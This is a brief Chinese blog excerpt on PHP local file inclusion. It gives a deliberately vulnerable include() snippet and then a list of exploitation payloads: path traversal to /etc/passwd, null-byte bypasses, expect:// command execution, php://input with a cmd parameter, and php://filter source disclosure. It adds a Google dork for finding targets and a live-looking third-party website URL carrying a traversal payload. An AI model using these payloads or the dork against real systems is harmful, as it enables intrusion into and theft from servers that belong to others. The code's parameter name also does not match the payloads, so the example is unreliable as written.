代码实例：

<?php

$file = $_GET['file'];

if(isset($file))

{

include("pages/$file");

}

else

{

include("index.php");

}

?>

利用方式：

/script.php?page=../../../../../etc/passwd

php?page=expect://id

?page=/etc/passwd%00

?page=/etc/passwd%2500

warpper://target

?page=php://input&cmd=ls

page=php://filter/convert.base64-encode/resource=

google hacking

inurl:index.php?page=

vulnerable website：

http://confituredebali.com/index.php?page=../../../../../../../../etc/passwd

最新文章

1. JavaScript 中的相等检测
2. lnmp搭建
3. BP神经网络
4. tomcat项目无法发布异常，Could not copy all resources to .........(转)
5. [转]12篇学通C#网络编程——第二篇 HTTP应用编程（上）
6. 【python】日志模块
7. [笔记]PHP文件系统处理
8. 初学android的第一个习作
9. [每天一道A+B]签到检测程序
10. win8笔记本无法搜索wifi信号找不到WLAN该 wifi共享特别注意的服务
11. Git学习笔记--Git常用命令
12. 快速排序（Quicksort）的Javascript实现
13. IOC框架：Unity
14. 线程——自定义多线程task
15. centos7 network eno16777736
16. 2101244 - FAQ: SAP HANA Multitenant Database Containers (MDC)
17. eclipse中的yaml插件
18. java基础-基础语法
19. Android——BroadcastReceiver
20. Spring MVC 异常处理 - ResponseStatusExceptionResolver

热门文章

1. 一起学SpringMVC之入门篇
2. Selenium(十八)：unittest单元测试框架(四) HTML测试报告
3. 关于scrapy中scrapy.Request中的属性
4. 使用Kubernetes进行ProxySQL本机群集
5. [browser navigator 之plugins] 写了一个检测游览器插件
6. expect 知识与示例说明
7. MD5是个好东西 / MD5 is a nice guy
8. shell-homeworkone
9. ACM 基本输入
10. Ovirt 简单配置